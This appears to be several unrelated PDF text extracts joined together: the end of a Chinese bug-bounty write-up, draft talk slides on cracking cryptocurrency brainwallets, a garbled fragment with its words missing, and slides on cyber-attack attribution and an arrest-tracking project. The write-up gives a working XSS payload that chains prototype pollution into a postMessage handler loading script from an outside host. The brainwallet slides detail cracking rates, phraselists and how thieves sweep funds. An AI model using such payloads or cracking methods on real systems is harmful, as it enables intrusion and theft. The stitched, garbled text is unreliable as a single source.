我扫到⼀个 p8.testa.com 的Client-Side Prototype Pollution,搞了很久之后,终于可以Xss
https://p8.testa.com/gb/view?ssc=us1&member=chinna.padma&constructor[prototype]
[jsAttributes][onafterscriptexecute]=alert(document.domain)
但是⼚商却说这个域名超出范围,我并不想让努⼒⽩费
然后我寻找到明确范围内的⼀处PostMessage
var POLL_INTERVAL = 2e3,
MAX_POLLS = 3,
ALLOWED_ORIGINS_REGEX = /^https?\:\/\/([^\/\?]+\.)*((testa|testb|testc)\.(net|com|co
m\.au))(\:\d+)?([\/\?]|$)/;
function onElementHeightChange(t, n, i, o) {
if (t && n) {
var r = t.clientHeight,
a = 0,
m = 0;
o = o || MAX_POLLS,
"number" == typeof r && (r -= 1),
function e() {
a = t.clientHeight,
m++,
r !== a && (n(), r = a),
t.onElementHeightChangeTimer && clearTimeout(t.onElementHeightChange
Timer),
i ? t.onElementHeightChangeTimer = setTimeout(e, i) : m <= o && (t.o
nElementHeightChangeTimer = setTimeout(e, POLL_INTERVAL))
}()
}
}
window.addEventListener("message",
function(e) {
if (ALLOWED_ORIGINS_REGEX.test(e.origin)) {
if ("string" != typeof e.data) return;
var t = e.source,
n = e.origin,
i = {};
try {
i = JSON.parse(e.data)
} catch (e) {
return
}
var o, r = i.id || 0,
a = i.markup,
m = i.scriptSrc,
c = "",
d = function() {
c = r + ":" + document.body.clientHeight,
t.postMessage(c, n)
};
if (a && (document.body.innerHTML = a, !m)) return void d();
m && ((o = document.createElement("script")).src = m, o.onload = function()
{
onElementHeightChange(document.body, d, i.pollInterval, i.maxPolls)
},
document.body.appendChild(o))
}
})
很明显此处,获取message中json字段 scriptSrc 作为script的src值,尽管已经验证了 origin ,但是由于有验证域的Xss,所
以可以通过验证获得Xss
Payload
https://p8.testa.com/gb/view?ssc=us1&member=chinna.padma&constructor[prototype][jsAttrib
utes][onafterscriptexecute]=document.body.innerHTML=%27%3Ciframe%20src=%22https://s.xx.c
om/yc/html/embed-iframe-min.2d7457d4.html%22%20onload=%22this.contentWindow.postMessage
(window.atob(\%27eyJpZCI6IjEiLCJtYXJrdXAiOiJ4Iiwic2NyaXB0U3JjIjoiaHR0cHM6Ly9uai5ycyIsInB
vbGxJbnRlcnZhbCI6IngiLCJtYXhQb2xscyI6IngifQ==\%27),\%27*\%27)%22%3E%3C/iframe%3E%27
结语
Dom Xss的形式还有很多,我把在BugBounty中遇到⽐较多见的形式分享出来,仅供参考。
由于很多都是在过去报告中摘出来的,所以可能有错误,欢迎指正,但主要是理解意思就好。
也欢迎交流,跟着⼤佬师傅们学习 😄 | pdf |
Cracking Cryptocurrency
Brainwallets
Ryan Castellucci
DRAFT SLIDES, WILL BE REVISED!
FOR FINAL VERSION AFTER TALK
https://rya.nc/dc23
Disclaimer
Stealing from people with weak passphrases
isn’t nice. Don’t be an asshole.
What’s a cryptocurrency?
● Bitcoin is the most widely known example.
● Electronic money which can operate without
banks or governments
● Secured with cryptographic algorithms
● Transferred via a sort of electronic check
● Checks are made public to prevent bounces
● Control of key == Control of money
What’s a brainwallet?
● A brainwallet is a cryptocurrency key that is
created from a password (or passphrase)
● Some people believe that this will make their
money harder to steal (or seize)
● Knowledge of password == Control of money
●
● Sending money to a brainwallet publishes a
hash of it. What if the hash can be cracked?
It seemed like it might be interesting
● Came across a blog post about brainwallets
○ The author made some and posted about
it to see how long they’d take to crack
● I figured writing a cracker would be a fun
way to spend my commute for a few days
● But why try to crack three brainwallets when
you can try to crack all of them?
My first brainwallet cracker
● Simple design, pass a file with pubkeyhashs,
then pipe words/phrases on STDIN
● Written in C using OpenSSL’s crypto
● ~10,000 passwords per second on my PC
● The slowest part, by far, is turning the
private key into a public key. More on that
later.
Taking it for a spin
● I start feeding it password cracking wordlists
● Find some tiny amounts of money
● Scrape wikiquote and a few other sites to
build myself a phraselist
● Run the phraselist - it gets some hits after a
few hours
● Pull balances, see one with 250BTC
Well, that is interesting. Now what?
● 250BTC was worth about $15k
● I wanted to fix this. I’m friends with Dan
Kaminsky. He’s fixed some big things. After
regaining my composure, I called him.
● As luck would have it, he was in town
● We meet up about an hour later to figure out
how to do the right thing
A plan begins to form
● I felt it would be wrong to take and “hope”
find the rightful owner
● I could send some spare change to it and
then take it back
● You can even put short words in a Bitcoin
address, so a subtle message is possible
● My girlfriend (now wife) piped up with “yoink”
That time I accidently stole 250 BTC
● After getting an appropriate address with
vanitygen, I do some transactions
Oops. :-(
● What’s that other address?
● …why isn’t it in the list of my addresses?
● …
● ...oh, right, that’s my change address…
● ...and Bitcoin had its own opinions on what
outputs should be spent
● Quick, before anyone notices!
Wait, what?
● Bitcoin transactions have inputs and outputs
● Old, unspent outputs are used as inputs on a
new transaction, but they can only be spent
in full
● You might need more than one, and you
might need to make change for yourself
● If you want details, see https://rya.nc/b4
See, I put it back. It’s fine.
● After fixing it, I did a few “run a few cents
through it” transactions
● The owner did not take the hint :-(
● I’ll just find them. The address was funded
by 12DK76obundhnnbGKcaKEn3BcMNNH5SVU4
● That address received a payout from
DeepBit. DeepBit collects email addresses.
Social engineering, Whitehat style
● I send “Tycho” the guy who runs DeepBit
messages via BitcoinTalk, email, and IRC
● Eventually I manage to talk to him on IRC
● I explain that one of his users has coins
stored unsafely, but can’t elaborate
● He wouldn’t give out any user details
● He does agree to contact the user for me
Success.
● The guy emails me, and I ask him to call me
● He does, and I establish that it was indeed
his brainwallet
● He moves the coins and insists on sending
me a small reward
Some history
● August 2011 Kaminsky demos Phidelius, an
OpenSSL hack, mentions Bitcoin as a
possible use https://rya.nc/b5
● January 2012 Casascius adds a brainwallet
entry to the Bitcoin wiki
● April 2012 brainwallet.org comes online
● I couldn’t really find anything pre-2012
How to make a brainwallet
"correct horse battery staple" Passphrase
v v v v v v v v SHA256
c4bbcb1fbec99d65bf59d85c8cb62ee2 Private key
db963f0fe106f483d9afa73bd4e39a8a
v v v v v v v v v v v v v v v v v v v privateToPublic
(UNCOMPRESSED) (COMPRESSED)
04 78d430274f8c5ec1321338151e9f27f4 -> 03 78d430274f8c5ec1321338151e9f27f4 Public key
c676a008bdf8638d07c0b6be9ab35c71 c676a008bdf8638d07c0b6be9ab35c71
a1518063243acd4dfe96b66e3f2ec801 | | | | | | | |
3c8e072cd09b3834a19f81f659cc3455 | | | | | | | | SHA256
v v v v v v v v v v v v v v v v
b57443645468e05a15302932b06b05e0 7c7c6fae6b95780f7423ff9ccf0c552a
580fa00ba5f5e60499c5c7e7d9c7f50e 8a5a7f883bdb1ee6c22c05ce71c1f288
v v v v v v v v v v v v RIPEMD160
c4c5d791fcb4654a1ef5 79fbfc3f34e7745860d7 Hash160
e03fe0ad3d9c598f9827 6137da68f362380c606c (used for tx)
v v v v v v v v v v v v Base58Check
1JwSSubhmg6iPtRjtyqhUYYH7bZg3Lfy1T 1C7zdTfnkzmr13HfA2vNm5SJYRK6nEKyq8 Address
What’s wrong with that?
● It’s an unsalted, un-iterated password hash
that you publish to the world…
● ...and cracking them directly yields
pseudonymous, easily laundered currency
● We’ve known for years that passwords need
to be run through a hardened hash
● People have very poor intuition of how
strong their passphrases are
Better options
● Electrum-style “12 word seed”, computer
generated but memorable with some effort
● WarpWallet allows for a salt (email) and
uses key stretching, but weak passphrases
still a problem
● BIP38 “paper wallets” - print it out and hide it
under your mattress
Key strength
● Usually measured in bits
● Adding a bit doubles the strength
● Adding ten increases it a thousandfold
● Figuring out how many bits a password is
equivalent to is very, very hard
● Microsoft’s estimate was that the average
user’s password was equivalent to ~40 bits
● That seems absurdly high
Key stretching
● Make cracking hard by slowing it down
● scrypt, bcrypt, pbkdf2, sha512crypt, etc
● In practice, you can make it on the order of a
million times slower
● Gain 20 bits +/- 4 bits in effective strength
● Need somewhere between 72 and 128 bits
● There’s a significant shortfall here
Extreme key stretching (just an idea)
● Generate a short (16-24 bits) random salt
● Have the KDF chew on it for a few seconds
● Save the output (the shortcut)
● Use the shortcut as salt to a to second KDF
● Without the shortcut, you can spend a few
hours brute forcing the salt
● A vetted scheme for this would be needed
Actually secure passwords
● Pick it randomly - easy, right?
● Random numbers are hard for humans to
remember
● Password managers!
● What protects the password manager?
● Backups are hard
● Turtles all the way down
Cryptomnemonics
● Humans have a hard time memorizing a
bunch of random numbers
● Turn the random numbers into something
easier to memorize
● Diceware is a very old scheme that does this
● Open problem, actively researched
● I built https://rya.nc/storybits - feedback?
● How easy can we make these things?
Introducing Brainflayer
● Does about 100,000 passphrases per
second on my quad core i7 3.5GHz
● Using EC2 spot instances would cost about
$700 to check a billion passphrases
● A mid-sized botnet with million nodes each
trying 10,000 passphrases per second could
check nearly 1015 (~249.5) in a day
Introducing Brainflayer (cont’d)
● At that speed a passphrase of four random
common English words falls in about an hour
● Low level optimization and fancy math are
not my thing, but there is plenty of room for
improvement here even without GPGPU
● Has a lookup table generation mode
● Crack multiple cryptocurrencies at once
How Brainflayer works
● We need to go from passphrase to Hash160
and check if that Hash160 has been used
● I got about a 10x speed increase switching
to libsecp256k1 to generate the public key
● Quickly checking if a Hash160 has ever
received money can be done with a data
structure called a bloom filter
Bloom filter?
● A space-efficient probabilistic data structure
● Consists of a large array of bits
● To add an item, hash that item n ways and
set n corresponding bits
● To check if an item is present, hash that item
n ways - if all n corresponding bits are set
then it probably is.
Probably?
● The error rate can be made quite small
● Most of the time we’re getting a “no” and we
want that to be fast
● The “probably” can be fully verified later
Isn’t running more hashes slow?
● Yes, even the non-cryptographic ones
● So we don’t run more hashes
● Our items are already hashed
● Just slice and dice the bits, which is fast
Building a phraselist
● Song lyric sites, Wikiquotes, Wikipedia,
Project Gutenberg, forums, reddit, etc.
● Needs normalization, then normalized lists
can have rules applied to them
Example cracked brainwallets
● Zed's dead baby. Zed's dead.
● 22Jan1997
● Am I invisible because you ignore me?
● antidis3stablishm3ntarianism
● youaremysunshinemyonlysunshine
● The Persistence Of Memory
● toby102
● permit me to issue and control the money of a nation
and i care not who makes its laws
Everyone loves demos.
<INSERT DEMO HERE>
What’s already happening?
● There appear to be at least four currently
active brainwallet thieves, probably more
● Send funds to a particularly weak brainwallet
and they’ll be gone in seconds
● Lookup tables for large numbers of
passwords have clearly been built
● Adaptive behaviour has been observed
● Cracking speeds unclear
Lookup tables?
● There is competition for weak brainwallets
● Must be fast, rainbow tables too slow
● Use your favorite key-value store
● Truncate the Hash160 (64 bits, save space)
● Store the passphrase or private key,
whichever is shorter
● A $120 4TB disk will store 236 passphrases
Lookup tables? (cont’d)
● Monitors for transactions
● Check addresses against key-value store
● LRU cache in front of key-value store
● On a hit, use the private key to make a new
transaction taking the funds
● Do this faster than others trying to do the
same
● I have not built any of this, but it exists
SUPER SECRET SECOND DEMO
<INSERT DEMO HERE> | pdf |
1.
2. xxx
3. xxx
ED
1. tcp/ipwin/linuxpython
2. javawebjava
iot
3. kalinmapsqlmapburpsuiteida
->->->->->->->->
->->->
mmorpg
web
apppwn
websrcphp
java
web
sxfvpn
1. sxf vpn
2. vpn
3.
4. vpnphpapachenodejs
5.
6.
1.
2.
3.
4.
5.
1.
2.
3.
1.
2.
3.
4.
5. p
p
6.
7.
8.
9.
10. cms | pdf |
“Cyber” Who Done It?!
Attribution Analysis
Through Arrest History
Jake%Kouns,%CISO
[email protected]
@jkouns
August&2016
Lee%Johnstone
Security%Researcher
@83leej
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
Cyber?%Drink!
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
Looking%Back%At%The%Last%Five%Years
Source:%CyberRiskAnalytics.com
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
2015%– Threat%Vector
Source:%CyberRiskAnalytics.com
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
2015%W Breach%Types
Source:%CyberRiskAnalytics.com
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
2015%Analysis%– Country%By%Records
Source:%CyberRiskAnalytics.com
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
2016%Year%To%Date
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
Attribution
Who is behind all of these
data breaches?
Attribution
What%Does%This%Really%Mean?
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
Attribution
What is Attribution?
• In social psychology, attribution is the
process by which individuals explain the causes
of behavior and events.
• Attribution in copyright law, is
acknowledgement as credit to the copyright
holder of a work.
• The attribution of information to its Source
(journalism)
Source:%Wikipedia
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
Cyber%Attribution
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
Cyber%Attribution
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
Cyber%Attribution
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
Why%Do%People%Care%About%Attribution?
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
Why%Do%People%Care%About%Attribution?
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
Sony%Pictures%W The%Interview
December&2014
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
INSERT
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
Sony%Hack%Attribution%Generator
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
Sony%Hack%Attribution%Generator
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
Sony%Hack%Attribution%Generator
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
WhoHackedUs.com
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
Cyber%Attribution%Dice
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
Cyber%Attribution%Dice
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
Attribution%8%Ball
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
Attribution%8%Ball%W Duo
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
Attribution%8%Ball%W SecuriTay
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
Attribution%8%Ball%W Threatbutt
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
Sony%Pictures%W The%Interview
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
Sony%Pictures%W The%Interview%– Who?
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
Norse%W Sony
• While Norse is not involved in the Sony case, it has
done its own investigation, and stated “We are very
confident that this was not an attack master-minded by
North Korea and that insiders were key to the
implementation of one of the most devastating attacks
in history”. Stammberger says Norse data is pointing
towards a woman who calls herself “Lena” and claims to
be connected with the so-called “Guardians of Peace”
hacking group. Norse believes it’s identified this woman
as someone who worked at Sony in Los Angeles for ten
years until leaving the company this past May.
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
Marc%Rogers%W Sony
Marc&Rogers
http://marcrogers.org/2014/12/18/whyWtheWsonyWhackWisWunlikelyWtoWbeWtheWworkWofWnorthWkorea/
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
Kim%Zetter – Sony
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
Crowdstrike (Dmitri)%W Sony
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
PBS%W Cyber%Attribution%Debate%Live!
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
FBI%W Sony
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
Lots%of%Debate%– Main%Two%Players!
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
Who%Is%Right?%%Who%Is%Wrong?
If evidence ends up being released, and there is clear
attribution, how will this impact companies like Norse
and Crowdstrike that have made such bold
statements? If a company making this statement is
blatantly wrong, does that suggest threat intelligence
they sell can’t be trusted or relied on by corporations?
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
FBI
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
Krebs%on%Norse%Imploding
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
Norse%@%RSA
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
Norse%– Attack%Map
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
Threatbutt Hacking%Attack%Attribution%Map
Cyber Attribution
Why%Is%It%So%Hard?
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
Attribution%Is%Hard
• Cyberspace does have some unique attributes which are not
mirrored in the real world.
– Typical CSI forensic / investigation work not possible
• Easy to “spoof” evidence
• Easy to use or embed others work (tools, exploits, malware)
– Just because it was used doesn’t mean that it was same people
– It could easily be used by different people/groups
• Nonexistence of physical “territory”
– Some attribution markers used in other areas such as warfare are
missing.
– Hackers typically don’t need an ‘assembly zone’ that can be
detected and watched.
– No ground boundary needs to be crossed
– No way to track back a “missile” launch without question
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
DNC%Hack
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
Give%Hillary%Money%For%Cybersecurity
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
DNC%– Attribution%– Guccifer%
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
DNC%– Attribution%W Russia
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
DNC%– Attribution%W Russia
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
DNC%– Attribution%– Person%or%Russia?
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
DNC%– Russia%– Hack%Back
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
DNC%– Russia%– Hack%Back
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
DNC%– Russia%– Hack%Back
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
Attribution%Matters?
Does it actually matter
that we get Cyber
Attribution correct?
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
Attribution%– North%Korea
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
Attribution%– North%Korea
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
Attribution%– North%Korea
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
Attribution%– Russia
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
Attribution%Is%Hard?!
So how can we actually figure out
who is behind these “hacks”?
• No security firm typically agrees on who’s done it
• Can’t trust when people “claiming” attacks
• Easy to hide IP addresses via Proxy servers, TOR, etc.
• Correlations between certain pieces of malware isn’t
hard evidence (debatable)
• Information (evidence) not shared to protect sources
• Using a “behavioral analysis unit” of FBI experts trained
to psychologically analyze foes based on their writings
and actions isn’t hard evidence
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
Attribution%Is%Hard?!
Do we need to improve
our Cyber Attribution
Capabilities?
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
Can%We%Improve?
Arrest Tracker
What%Is%It?
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
Arrest%Tracker
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
Arrest%Tracker
Founded by Lee Johnstone
–Security Researcher
–Founder Cyber War News
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
Arrest%Tracker
• Arrest Tracker (https://arresttracker.com/)
– Started in 2013 by Lee J
– The project aims to track computer intrusion incidents
resulting in an arrest, detaining of a person or persons, seizure
of goods, or other related activities that are directly linked to
computer crimes.
• Track incidents from all types of “cyber” crime (drink!)
and hacking related incidents.
• The Arrest Tracker project currently has 1,431 incidents
collected as of 7/29/2016.
• More than just “arrests”, Cyber Crime Incident Tracker
• Project is officially launching as of today!
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
Arrest%Tracker%W Fields
Arrest Tracker
What%Can%It%Help%Us%With?
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
Arrest%Tracker%Disclosures
We need to first recognize there
are limitations with the data!
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
Arrest%Tracker%Disclosures
We must also remember that this
is based on mostly ARREST
incidents, therefore it tells a story
from that viewpoint.
Expanded to include more Cyber
Crime and will continue to add
more!
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
Arrest%Tracker%Disclosures
We are using data based on
reported arrests and raids.
We must also remember, in
many cases, governments
would rather track and follow
criminals, rather than arrest
them for various reasons.
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
What%Can%Arrest%Tracker%Tell%Us?%
• Provide detailed computer crime arrest information
and statistics
• Who is behind these data breaches and cyber crime
• What are the demographics?
• Extraditions
• Details on Sentences
• Details on Monetary fines
• Learning about law enforcement
• Profile of a “hacker”
• More!
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
Face%Of%A%“Hacker”
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
Face%Of%A%“Hacker”%– Google%Images
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
Face%Of%A%“Hacker”%– Mr%Robot
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
Real%Faces%of%Cyber%Crime%– Arrest%Tracker
Cyber Arrests
Timeline
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
Timeline
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
Timeline
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
Timeline
• Cyber Incidents in past decades:
–1970:’s 2 incidents
–1980:’s 37 incidents
–1990:’s 59 incidents
–2000:’s 345 incidents
–2010:’s 988 incidents
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
Early%Crime%Research
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
1970’s%W First%Known%Arrest
• Oldest Incident in Arrest Tracker is from 1971.
– Hugh Jeffery Ward
– 1971-02-19
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
1970’s%W First%Known%Arrest
• Hugh Jeffery Ward
• Incident Occurred: 1971-02-19
• 29 years old at the time
• Accused of breaking into I.S.D computer systems
and stealing data.
• Trade Secret Theft
• Plead Guilty
• Fined $5,000
• 36 Months of Probation
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
